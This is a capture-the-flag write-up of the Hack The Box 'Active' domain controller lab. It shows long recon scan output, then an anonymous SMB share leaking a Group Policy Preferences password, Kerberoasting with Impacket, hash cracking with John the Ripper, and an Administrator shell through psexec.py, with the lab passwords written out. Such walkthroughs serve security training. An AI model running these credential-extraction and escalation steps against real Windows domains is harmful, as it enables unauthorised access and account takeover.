This is a walkthrough of the Active box from Hack The Box, done without using Metasploit.
1. Reconaissance
I initially ran my scan using the nmapautomator script, but it took almost an hour to complete, and I also lost some of the beginning results when I tried to go back later and copy it. So below is the bottom part, and the ports I found open that stuck out to me were ldap, kerberos and smb:
nikto -host 10.10.10.100:593 | tee recon/nikto_10.10.10.100_593.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.100:49157 -o recon/gobuster_10.10.10.100_49157.txt
nikto -host 10.10.10.100:49157 | tee recon/nikto_10.10.10.100_49157.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.100:47001 -o recon/gobuster_10.10.10.100_47001.txt
nikto -host 10.10.10.100:47001 | tee recon/nikto_10.10.10.100_47001.txt
SMB Recon:
smbmap -H 10.10.10.100 | tee recon/smbmap_10.10.10.100.txt
smbclient -L "//10.10.10.100/" -U "guest"% | tee recon/smbclient_10.10.10.100.txt
nmap -Pn -p445 --script vuln -oN recon/SMB_vulns_10.10.10.100.txt 10.10.10.100
DNS Recon:
host -l 10.10.10.100 10.10.10.100 | tee recon/hostname_10.10.10.100.txt
dnsrecon -r 10.10.10.0/24 -n 10.10.10.100 | tee recon/dnsrecon_10.10.10.100.txt
dnsrecon -r 127.0.0.0/24 -n 10.10.10.100 | tee recon/dnsrecon-local_10.10.10.100.txt
dig -x 10.10.10.100 @10.10.10.100 | tee recon/dig_10.10.10.100.txt
ldap Recon:
ldapsearch -x -h 10.10.10.100 -s base | tee recon/ldapsearch_10.10.10.100.txt
ldapsearch -x -h 10.10.10.100 -b $(cat recon/ldapsearch_10.10.10.100.txt | grep rootDomainNamingContext | cut -d ' ' -f2) | tee recon/ldapsearch_DC_10.10.10.100.txt
nmap -Pn -p 389 --script ldap-search --script-args 'ldap.username="$(cat recon/ldapsearch_10.10.10.100.txt | grep rootDomainNamingContext | cut -d \ \ -f2)"' 10.10.10.100 -oN recon/nmap_ldap_10.10.10.100.txt
Which commands would you like to run?
All (Default), dig, dnsrecon, gobuster, host, ldapsearch, nikto, nmap, smbclient, smbmap, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.100:593
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/10/14 18:45:00 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.100:593/: Get http://10.10.10.100:593/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.10.10.100:593
---------------------------------------------------------------------------
+ 0 host(s) tested
Finished nikto scan
=========================
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.100:49157
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/10/14 18:45:31 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.100:49157/: Get http://10.10.10.100:49157/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.10.10.100:49157
---------------------------------------------------------------------------
+ 0 host(s) tested
Finished nikto scan
=========================
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.100:47001
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/10/14 18:46:02 Starting gobuster
===============================================================
===============================================================
2020/10/14 18:47:28 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 47001
+ Start Time: 2020-10-14 18:47:29 (GMT-7)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7870 requests: 6 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-10-14 19:13:35 (GMT-7) (1566 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
Starting smbmap scan
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Finished smbmap scan
=========================
Starting smbclient scan
session setup failed: NT_STATUS_ACCOUNT_DISABLED
Finished smbclient scan
=========================
Starting nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 19:13 PDT
Nmap scan report for 10.10.10.100
Host is up (0.090s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 24.44 seconds
Finished nmap scan
=========================
Starting host scan
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases:
Host 100.10.10.10.in-addr.arpa not found: 2(SERVFAIL)
Finished host scan
=========================
Starting dnsrecon scan
[*] Reverse Look-up of a Range
[*] Performing Reverse Lookup from 10.10.10.0 to 10.10.10.255
[+] 0 Records Found
Finished dnsrecon scan
=========================
Starting dnsrecon scan
[*] Reverse Look-up of a Range
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] {'type': 'PTR', 'name': 'localhost', 'address': '127.0.0.1'}
[+] 1 Records Found
Finished dnsrecon scan
=========================
Starting dig scan
; <<>> DiG 9.16.2-Debian <<>> -x 10.10.10.100 @10.10.10.100
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 51358
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: acbe1120bbb7b8f5 (echoed)
;; QUESTION SECTION:
;100.10.10.10.in-addr.arpa. IN PTR
;; Query time: 99 msec
;; SERVER: 10.10.10.100#53(10.10.10.100)
;; WHEN: Wed Oct 14 19:17:14 PDT 2020
;; MSG SIZE rcvd: 66
Finished dig scan
=========================
Starting ldapsearch scan
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
currentTime: 20201015021913.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
rootDomainNamingContext: DC=active,DC=htb
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 90154
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: DC.active.htb
ldapServiceName: active.htb:dc$@ACTIVE.HTB
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=active,DC=htb
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Finished ldapsearch scan
=========================
Starting ldapsearch scan
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1
# numResponses: 1
Finished ldapsearch scan
=========================
Starting nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 19:17 PDT
Nmap scan report for 10.10.10.100
Host is up (0.085s latency).
PORT STATE SERVICE
389/tcp open ldap
Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
Finished nmap scan
=========================
---------------------Finished all Nmap scans---------------------
Completed in 56 minute(s) and 26 second(s)
root@kali:/home/churr0s/Scripts/nmapAutomator#
You can see from the smb scan results that we also have a readable share called “Replication” and it can be accessed anonymously
You can get similar results by running
- regular nmap scan
- nmap –script vuln 10.10.10.100
- nmap –script ldap-search.nse -p 389,3268 10.10.10.100
- enum4linux -a 10.10.10.100 (to view smb shares). This shows us that there is a domain name that is active.htb. Once you know this you can actually set your machine’s /etc/hosts file to point 10.10.10.100 to active.htb to make further enumeration easier
- smbclient -L 10.10.10.100 (to view smb shares)
Now let’s use smbclient to access Replication and see what we can find (the autorecon tool would also be good for this):
smbclient //10.10.10.100/Replication
There’s an interesting file called groups.xml. I’m going to download it to my machine and open it:
smb: \>get Groups.xml
- this will download the file groups.xml to your current working directory on your own machine
Now let’s cat the file and see what’s in it:
We can see there is a user called SVC_TGS and an encrypted password. A little background on groups.xml: these came with a feature called “group policy preference” that was introduced on Windows Server 2008. When a new GPP is created, there is an associated XML file created with configuration info and a password if provided (that is AES-256 encrypted). If a system has patch MS14-025 installed, this prevents admins from putting password data into a group policy preference.
We can use a tool called “gpp-decrypt” which comes with Kali to try to decrypt this hash:
So now we have the username (SVC_TGS) and the password (GPPstillStandingStrong2k18)
There was also a share called “Users”…and now we have a username and password, so let’s try to see if we can log in!
2. Initial foodhold
We’re going to try to log into the Users share with the username + password we just got:
smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Success, and we can find a user flag for SVC_TGS! Since we’re just accessing a share and we are not actually ON the box, we will need to download the flag to our own computer to open using get user.txt:
3. Privilege escalation
We know we have credentials for user SVC_TGS, but they are not admin credentials, so we need tot ry to escalate privileges. We will need to request a TGS. I found the following background info on it here:
Windows uses Service Principal Names (SPNs) to identify which service account is being used to encrypt the TGS. Each domain user can request a TGS from a domain controller for any service that has a registered SPN. when the TGS is created, the DC doesn’t check whether the requesting user is authorized to access the resource. It is being done by the service.
In another sense, a Kerberoasting attack allows any valid domain account to request a service ticket for any service and the use the ticket for offline password cracking attempts.
The Powershell Empire project has a module called “Invoke-Kerberoast”. This shows us all the SPNs for a certain domain and requests a TGS for every service account. This output can then be used to crack the password. However, we don’t have access to Powershell. So we can use a similar python scrip: Impacket’s GetUserSPN.py Please note that GetUserSPN.py requires the user name and password of a domain user (which we have!)
Install impacket, and then locate and copy GetUserSPNs.py to your working directory (I renamed mine SPNs.py)
Now type the following to run the script:
python SPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -save
The result will be a password hash. Now we need to crack it. Let’s use John The Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hashkerberos
- rockyou.txt is a wordlist that comes included with kali
- hashkerberos is the name of the file I saved the password hash in
The result shows us the cracked password: Ticketmaster1968
Now that we have administrator credentials, we can actually use Psexec to log in with them!
Locate psexec.py and copy it over to your working directory (I renamed mine pe.py)
Then type:
python psexec.py Administrator@10.10.10.100
We are now root–grab the flag!
